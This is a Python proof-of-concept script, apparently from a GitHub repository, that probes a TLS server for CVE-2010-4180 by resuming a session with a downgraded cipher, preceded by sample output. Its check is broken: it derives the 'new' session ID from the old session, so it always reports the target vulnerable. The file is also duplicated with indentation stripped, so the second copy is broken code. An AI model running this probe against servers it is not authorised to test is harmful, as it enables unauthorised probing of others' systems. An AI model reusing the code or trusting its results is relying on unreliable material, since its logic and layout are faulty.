milo2012/CVE-2010-4180.py

## CVE-2010-4180.py
'''
#https://www.tenable.com/plugins/nessus/51892

% python3 CVE-2010-4180.py -t x.x.x.x
[*] Connecting using Cipher: ECDHE-RSA-AES256-GCM-SHA384
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES256-GCM-SHA384
    Session-ID: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
    Session-ID-ctx:
    Master-Key: 1DEAFF8A6C400FB1958751910F0E63451CA6662C3147C48AED7C68A45AC940C8939E2E6954A167B516578BBFCEC51576
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1614857820
    Timeout   : 7200 (sec)
    Verify return code: 20 (unable to get local issuer certificate)

[*] Current Session_id: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522

Accepted cipher suites for TLS_1_2:
* TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256
* TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
* TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256
* TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
* TLS_RSA_WITH_ARIA_256_GCM_SHA384
* TLS_RSA_WITH_ARIA_128_GCM_SHA256
* TLS_RSA_WITH_AES_256_GCM_SHA384
* TLS_RSA_WITH_AES_256_CCM_8
* TLS_RSA_WITH_AES_256_CCM
* TLS_RSA_WITH_AES_256_CBC_SHA256
* TLS_RSA_WITH_AES_256_CBC_SHA
* TLS_RSA_WITH_AES_128_GCM_SHA256
* TLS_RSA_WITH_AES_128_CCM_8
* TLS_RSA_WITH_AES_128_CCM
* TLS_RSA_WITH_AES_128_CBC_SHA256
* TLS_RSA_WITH_AES_128_CBC_SHA
* TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
* TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384
* TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256
* TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384
* TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256
* TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
* TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
* TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
* TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
* TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
* TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA

[*] Resuming session with downgraded cipher: CAMELLIA256-SHA
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : CAMELLIA256-SHA
    Session-ID: 9050C06AA9C2F039B2256275F044DE1EE7A9A0E41D1910645C1C7CAFCEEA3A45
    Session-ID-ctx:
    Master-Key: 85724393381819731AD31C437D2354E689C2E64FC30617BA650984280BA124D92BC01560C934A5F7441B1643D305B656
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - 1b 69 77 97 dc 86 6c 22-08 a3 fc 33 dd 05 7d 3f   .iw...l"...3..}?
    0010 - 4e c3 da 12 06 da 2a a8-5a 67 ff 33 4d 9e f3 31   N.....*.Zg.3M..1
    0020 - d8 03 d4 2f c9 03 f9 64-59 93 9a 16 58 64 f8 0a   .../...dY...Xd..
    0030 - ce c0 ab 67 0f 0d 27 e2-fe fa 70 c6 5d a9 96 0c   ...g..'...p.]...
    0040 - 19 b3 2e 1a 60 46 4a 63-ae a5 11 c6 a1 c6 66 b0   ....`FJc......f.
    0050 - fa ae 05 e7 21 3a 1b df-c7 78 f3 2b 1c 57 f3 32   ....!:...x.+.W.2
    0060 - d5 f3 fe 8c e2 bd 5d 3c-01 6b 35 aa 30 ac 48 53   ......]<.k5.0.HS
    0070 - 58 35 4c 17 8f 2d e8 12-7c 91 b7 a3 c1 96 8e da   X5L..-..|.......
    0080 - 35 17 f5 b3 9d 6d 9b b1-fd d6 e3 e6 65 09 81 69   5....m......e..i
    0090 - 64 cf 49 ad d0 8b 55 7e-ee fb f1 0a 31 1f b1 5d   d.I...U~....1..]
    00a0 - 0e 86 2e 4e 18 c5 bb ed-0e e7 d1 74 66 97 d8 41   ...N.......tf..A
    00b0 - 15 7a 7e dc db 38 27 55-d5 7d 37 2f 43 06 73 aa   .z~..8'U.}7/C.s.

    Start Time: 1614857837
    Timeout   : 7200 (sec)
    Verify return code: 20 (unable to get local issuer certificate)

[*] New Session_id: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
[+] x.x.x.x:443 is vulnerable to CVE-2010-4180
'''

from sslyze import (
    ServerNetworkLocationViaDirectConnection,
    ServerConnectivityTester,
    Scanner,
    ServerScanRequest,
    ScanCommand,
    ServerConnectivityInfo,
    TlsVersionEnum,
    ServerNetworkConfiguration,
    ServerTlsProbingResult,
    TlsVersionEnum,
    ClientAuthRequirementEnum,
)
from nassl import _nassl
from nassl.legacy_ssl_client import LegacySslClient
from sslyze.server_connectivity import ServerConnectivityInfo, TlsVersionEnum
from sslyze.errors import ConnectionToServerFailed
import nassl, sys, optparse, json, sslyze, os

def getSupportedCiphers(server_info, tlsVer):
	resList=[]
	scanCmd=ScanCommand.TLS_1_0_CIPHER_SUITES
	scanner = Scanner()
	if tlsVer=="TLS_1_0":
		scanCmd=ScanCommand.TLS_1_0_CIPHER_SUITES
	if tlsVer=="TLS_1_1":
		scanCmd=ScanCommand.TLS_1_1_CIPHER_SUITES
	if tlsVer=="TLS_1_2":
		scanCmd=ScanCommand.TLS_1_2_CIPHER_SUITES

	server_scan_req = ServerScanRequest(server_info=server_info, scan_commands={ScanCommand.CERTIFICATE_INFO, scanCmd},)
	scanner.queue_scan(server_scan_req)
	for server_scan_result in scanner.get_results():
		try:
			result = server_scan_result.scan_commands_results[scanCmd]
			print("\nAccepted cipher suites for "+tlsVer+":")
			for accepted_cipher_suite in result.accepted_cipher_suites:
				print(f"* {accepted_cipher_suite.cipher_suite.name}")
				resList.append(accepted_cipher_suite.cipher_suite.name)
		except KeyError:
			pass
	return(resList)

def readJson(filename):
	f = open(filename,"r")
	text = f.read()
	json_data = json.loads(text)
	return(json_data)

def main(hostname,portNo) -> None:
	filename="tlsdb.json"
	if not os.path.exists(filename):
		print("[-] "+filename+" is missing. Please download from https://raw.githubusercontent.com/tiran/tlsdb/master/tlsdb.json")
		sys.exit()
	cipherDBDict=readJson(filename)
	cipherDBDict=cipherDBDict['ciphers']
	ssl_version_downgrade=''

	tlsVer=""
	ssl_session=None
	tlsVerList=[]
	tlsVerList.append(TlsVersionEnum.TLS_1_2)
	tlsVerList.append(TlsVersionEnum.TLS_1_1)
	tlsVerList.append(TlsVersionEnum.TLS_1_0)
	for ssl_version_downgrade in tlsVerList:
		try:
			if "TLS_1_0" in str(ssl_version_downgrade):
				tlsVer="TLS_1_0"
			if "TLS_1_1" in str(ssl_version_downgrade):
				tlsVer="TLS_1_1"
			if "TLS_1_2" in str(ssl_version_downgrade):
				tlsVer="TLS_1_2"
			server_location = ServerNetworkLocationViaDirectConnection.with_ip_address_lookup(hostname, portNo)
			final_network_config = ServerNetworkConfiguration.default_for_server_location(server_location)
			server_info = ServerConnectivityTester().perform(server_location, final_network_config)
			currentCipher=server_info.tls_probing_result.cipher_suite_supported
			ssl_connection = server_info.get_preconfigured_tls_connection(override_tls_version=ssl_version_downgrade, should_use_legacy_openssl=True)
			ssl_connection.ssl_client.disable_stateless_session_resumption()
			ssl_connection.connect()
			print("[*] Connecting using Cipher: "+currentCipher)
			ssl_session = ssl_connection.ssl_client.get_session()
			print(ssl_session.as_text())
			tmpText=ssl_session.as_text()
			tmpTextList=tmpText.split("\n")
			for x in tmpTextList:
				if "Cipher    : " in x:
					y=x.split("Cipher    :")[1]
					y=y.strip()
					currentCipher=y
			session_string = ((ssl_session.as_text()).split("Session-ID:"))[1]
			session_id = (session_string.split("Session-ID-ctx:"))[0].strip()
			print("[*] Current Session_id: "+session_id)
			ssl_connection.close()
			break
		except sslyze.errors.ServerRejectedTlsHandshake as e:
			pass
	supportedCipherList=getSupportedCiphers(server_info,tlsVer)
	if len(supportedCipherList)>0:
		cipherDBDict1={}
		supportedCipher=""
		for i in sorted(cipherDBDict):
			x=cipherDBDict[i]
			nssName=x['nss']
			opensslName=x['openssl']
			cipherDBDict1[nssName]=opensslName
		chosenCipher=""
		for x in supportedCipherList:
			if currentCipher!=x:
				try:
					if cipherDBDict1[x]!=currentCipher:
						chosenCipher=cipherDBDict1[x]
						break
				except KeyError:
					continue

		try:
			print("\n[*] Resuming session with downgraded cipher: "+chosenCipher)
			tls_probing_result=ServerTlsProbingResult(highest_tls_version_supported=ssl_version_downgrade,cipher_suite_supported=chosenCipher,client_auth_requirement=ClientAuthRequirementEnum.DISABLED,supports_ecdh_key_exchange=False)
			server_info = ServerConnectivityInfo(server_location, final_network_config, tls_probing_result)
			ssl_connection1 = server_info.get_preconfigured_tls_connection(override_tls_version=ssl_version_downgrade, should_use_legacy_openssl=True)
			ssl_connection1.ssl_client.set_session(ssl_session)
			ssl_connection.ssl_client.disable_stateless_session_resumption()
			ssl_connection1.ssl_client.set_cipher_list(chosenCipher)
			ssl_connection1.connect()
			new_session = ssl_connection1.ssl_client.get_session()
			print(new_session.as_text())
			session_string = ((ssl_session.as_text()).split("Session-ID:"))[1]
			new_session_id = (session_string.split("Session-ID-ctx:"))[0].strip()
			print("[*] New Session_id: "+new_session_id)
			if session_id==new_session_id:
				print("[+] "+hostname+":"+str(portNo)+" is vulnerable to CVE-2010-4180")
			ssl_connection1.close()
		except sslyze.errors.ServerRejectedTlsHandshake:
			print("[-] "+hostname+":"+str(portNo)+" is NOT vulnerable to CVE-2010-4180")
		except nassl._nassl.OpenSSLError:
			print("[-] "+hostname+":"+str(portNo)+" is NOT vulnerable to CVE-2010-4180")

parser = optparse.OptionParser()
parser.add_option('-t','--target', action="store", dest="targetIP", help="target server (e.g. 4.2.2.2:443)")
options, remainder = parser.parse_args()
if not options.targetIP:
	print("[-] Please provide the -t or --target argument")
	sys.exit()
else:
	if ":" not in (options.targetIP):
		hostname=options.targetIP
		portNo="443"
		main(hostname,portNo)
	else:
		x=(options.targetIP).split(":")
		hostname=x[0]
		portNo=x[1]
		main(hostname,portNo)
	'''
	#https://www.tenable.com/plugins/nessus/51892

	% python3 CVE-2010-4180.py -t x.x.x.x
	[*] Connecting using Cipher: ECDHE-RSA-AES256-GCM-SHA384
	SSL-Session:
	Protocol : TLSv1.2
	Cipher : ECDHE-RSA-AES256-GCM-SHA384
	Session-ID: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
	Session-ID-ctx:
	Master-Key: 1DEAFF8A6C400FB1958751910F0E63451CA6662C3147C48AED7C68A45AC940C8939E2E6954A167B516578BBFCEC51576
	Key-Arg : None
	PSK identity: None
	PSK identity hint: None
	SRP username: None
	Start Time: 1614857820
	Timeout : 7200 (sec)
	Verify return code: 20 (unable to get local issuer certificate)

	[*] Current Session_id: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522

	Accepted cipher suites for TLS_1_2:
	* TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256
	* TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
	* TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256
	* TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
	* TLS_RSA_WITH_ARIA_256_GCM_SHA384
	* TLS_RSA_WITH_ARIA_128_GCM_SHA256
	* TLS_RSA_WITH_AES_256_GCM_SHA384
	* TLS_RSA_WITH_AES_256_CCM_8
	* TLS_RSA_WITH_AES_256_CCM
	* TLS_RSA_WITH_AES_256_CBC_SHA256
	* TLS_RSA_WITH_AES_256_CBC_SHA
	* TLS_RSA_WITH_AES_128_GCM_SHA256
	* TLS_RSA_WITH_AES_128_CCM_8
	* TLS_RSA_WITH_AES_128_CCM
	* TLS_RSA_WITH_AES_128_CBC_SHA256
	* TLS_RSA_WITH_AES_128_CBC_SHA
	* TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
	* TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384
	* TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256
	* TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384
	* TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256
	* TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
	* TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
	* TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
	* TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	* TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
	* TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA

	[*] Resuming session with downgraded cipher: CAMELLIA256-SHA
	SSL-Session:
	Protocol : TLSv1.2
	Cipher : CAMELLIA256-SHA
	Session-ID: 9050C06AA9C2F039B2256275F044DE1EE7A9A0E41D1910645C1C7CAFCEEA3A45
	Session-ID-ctx:
	Master-Key: 85724393381819731AD31C437D2354E689C2E64FC30617BA650984280BA124D92BC01560C934A5F7441B1643D305B656
	Key-Arg : None
	PSK identity: None
	PSK identity hint: None
	SRP username: None
	TLS session ticket lifetime hint: 300 (seconds)
	TLS session ticket:
	0000 - 1b 69 77 97 dc 86 6c 22-08 a3 fc 33 dd 05 7d 3f .iw...l"...3..}?
	0010 - 4e c3 da 12 06 da 2a a8-5a 67 ff 33 4d 9e f3 31 N.....*.Zg.3M..1
	0020 - d8 03 d4 2f c9 03 f9 64-59 93 9a 16 58 64 f8 0a .../...dY...Xd..
	0030 - ce c0 ab 67 0f 0d 27 e2-fe fa 70 c6 5d a9 96 0c ...g..'...p.]...
	0040 - 19 b3 2e 1a 60 46 4a 63-ae a5 11 c6 a1 c6 66 b0 ....`FJc......f.
	0050 - fa ae 05 e7 21 3a 1b df-c7 78 f3 2b 1c 57 f3 32 ....!:...x.+.W.2
	0060 - d5 f3 fe 8c e2 bd 5d 3c-01 6b 35 aa 30 ac 48 53 ......]<.k5.0.HS
	0070 - 58 35 4c 17 8f 2d e8 12-7c 91 b7 a3 c1 96 8e da X5L..-..\|.......
	0080 - 35 17 f5 b3 9d 6d 9b b1-fd d6 e3 e6 65 09 81 69 5....m......e..i
	0090 - 64 cf 49 ad d0 8b 55 7e-ee fb f1 0a 31 1f b1 5d d.I...U~....1..]
	00a0 - 0e 86 2e 4e 18 c5 bb ed-0e e7 d1 74 66 97 d8 41 ...N.......tf..A
	00b0 - 15 7a 7e dc db 38 27 55-d5 7d 37 2f 43 06 73 aa .z~..8'U.}7/C.s.

	Start Time: 1614857837
	Timeout : 7200 (sec)
	Verify return code: 20 (unable to get local issuer certificate)

	[*] New Session_id: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
	[+] x.x.x.x:443 is vulnerable to CVE-2010-4180
	'''

	from sslyze import (
	ServerNetworkLocationViaDirectConnection,
	ServerConnectivityTester,
	Scanner,
	ServerScanRequest,
	ScanCommand,
	ServerConnectivityInfo,
	TlsVersionEnum,
	ServerNetworkConfiguration,
	ServerTlsProbingResult,
	TlsVersionEnum,
	ClientAuthRequirementEnum,
	)
	from nassl import _nassl
	from nassl.legacy_ssl_client import LegacySslClient
	from sslyze.server_connectivity import ServerConnectivityInfo, TlsVersionEnum
	from sslyze.errors import ConnectionToServerFailed
	import nassl, sys, optparse, json, sslyze, os

	def getSupportedCiphers(server_info, tlsVer):
	resList=[]
	scanCmd=ScanCommand.TLS_1_0_CIPHER_SUITES
	scanner = Scanner()
	if tlsVer=="TLS_1_0":
	scanCmd=ScanCommand.TLS_1_0_CIPHER_SUITES
	if tlsVer=="TLS_1_1":
	scanCmd=ScanCommand.TLS_1_1_CIPHER_SUITES
	if tlsVer=="TLS_1_2":
	scanCmd=ScanCommand.TLS_1_2_CIPHER_SUITES

	server_scan_req = ServerScanRequest(server_info=server_info, scan_commands={ScanCommand.CERTIFICATE_INFO, scanCmd},)
	scanner.queue_scan(server_scan_req)
	for server_scan_result in scanner.get_results():
	try:
	result = server_scan_result.scan_commands_results[scanCmd]
	print("\nAccepted cipher suites for "+tlsVer+":")
	for accepted_cipher_suite in result.accepted_cipher_suites:
	print(f"* {accepted_cipher_suite.cipher_suite.name}")
	resList.append(accepted_cipher_suite.cipher_suite.name)
	except KeyError:
	pass
	return(resList)

	def readJson(filename):
	f = open(filename,"r")
	text = f.read()
	json_data = json.loads(text)
	return(json_data)

	def main(hostname,portNo) -> None:
	filename="tlsdb.json"
	if not os.path.exists(filename):
	print("[-] "+filename+" is missing. Please download from https://raw.githubusercontent.com/tiran/tlsdb/master/tlsdb.json")
	sys.exit()
	cipherDBDict=readJson(filename)
	cipherDBDict=cipherDBDict['ciphers']
	ssl_version_downgrade=''

	tlsVer=""
	ssl_session=None
	tlsVerList=[]
	tlsVerList.append(TlsVersionEnum.TLS_1_2)
	tlsVerList.append(TlsVersionEnum.TLS_1_1)
	tlsVerList.append(TlsVersionEnum.TLS_1_0)
	for ssl_version_downgrade in tlsVerList:
	try:
	if "TLS_1_0" in str(ssl_version_downgrade):
	tlsVer="TLS_1_0"
	if "TLS_1_1" in str(ssl_version_downgrade):
	tlsVer="TLS_1_1"
	if "TLS_1_2" in str(ssl_version_downgrade):
	tlsVer="TLS_1_2"
	server_location = ServerNetworkLocationViaDirectConnection.with_ip_address_lookup(hostname, portNo)
	final_network_config = ServerNetworkConfiguration.default_for_server_location(server_location)
	server_info = ServerConnectivityTester().perform(server_location, final_network_config)
	currentCipher=server_info.tls_probing_result.cipher_suite_supported
	ssl_connection = server_info.get_preconfigured_tls_connection(override_tls_version=ssl_version_downgrade, should_use_legacy_openssl=True)
	ssl_connection.ssl_client.disable_stateless_session_resumption()
	ssl_connection.connect()
	print("[*] Connecting using Cipher: "+currentCipher)
	ssl_session = ssl_connection.ssl_client.get_session()
	print(ssl_session.as_text())
	tmpText=ssl_session.as_text()
	tmpTextList=tmpText.split("\n")
	for x in tmpTextList:
	if "Cipher : " in x:
	y=x.split("Cipher :")[1]
	y=y.strip()
	currentCipher=y
	session_string = ((ssl_session.as_text()).split("Session-ID:"))[1]
	session_id = (session_string.split("Session-ID-ctx:"))[0].strip()
	print("[*] Current Session_id: "+session_id)
	ssl_connection.close()
	break
	except sslyze.errors.ServerRejectedTlsHandshake as e:
	pass
	supportedCipherList=getSupportedCiphers(server_info,tlsVer)
	if len(supportedCipherList)>0:
	cipherDBDict1={}
	supportedCipher=""
	for i in sorted(cipherDBDict):
	x=cipherDBDict[i]
	nssName=x['nss']
	opensslName=x['openssl']
	cipherDBDict1[nssName]=opensslName
	chosenCipher=""
	for x in supportedCipherList:
	if currentCipher!=x:
	try:
	if cipherDBDict1[x]!=currentCipher:
	chosenCipher=cipherDBDict1[x]
	break
	except KeyError:
	continue

	try:
	print("\n[*] Resuming session with downgraded cipher: "+chosenCipher)
	tls_probing_result=ServerTlsProbingResult(highest_tls_version_supported=ssl_version_downgrade,cipher_suite_supported=chosenCipher,client_auth_requirement=ClientAuthRequirementEnum.DISABLED,supports_ecdh_key_exchange=False)
	server_info = ServerConnectivityInfo(server_location, final_network_config, tls_probing_result)
	ssl_connection1 = server_info.get_preconfigured_tls_connection(override_tls_version=ssl_version_downgrade, should_use_legacy_openssl=True)
	ssl_connection1.ssl_client.set_session(ssl_session)
	ssl_connection.ssl_client.disable_stateless_session_resumption()
	ssl_connection1.ssl_client.set_cipher_list(chosenCipher)
	ssl_connection1.connect()
	new_session = ssl_connection1.ssl_client.get_session()
	print(new_session.as_text())
	session_string = ((ssl_session.as_text()).split("Session-ID:"))[1]
	new_session_id = (session_string.split("Session-ID-ctx:"))[0].strip()
	print("[*] New Session_id: "+new_session_id)
	if session_id==new_session_id:
	print("[+] "+hostname+":"+str(portNo)+" is vulnerable to CVE-2010-4180")
	ssl_connection1.close()
	except sslyze.errors.ServerRejectedTlsHandshake:
	print("[-] "+hostname+":"+str(portNo)+" is NOT vulnerable to CVE-2010-4180")
	except nassl._nassl.OpenSSLError:
	print("[-] "+hostname+":"+str(portNo)+" is NOT vulnerable to CVE-2010-4180")

	parser = optparse.OptionParser()
	parser.add_option('-t','--target', action="store", dest="targetIP", help="target server (e.g. 4.2.2.2:443)")
	options, remainder = parser.parse_args()
	if not options.targetIP:
	print("[-] Please provide the -t or --target argument")
	sys.exit()
	else:
	if ":" not in (options.targetIP):
	hostname=options.targetIP
	portNo="443"
	main(hostname,portNo)
	else:
	x=(options.targetIP).split(":")
	hostname=x[0]
	portNo=x[1]
	main(hostname,portNo)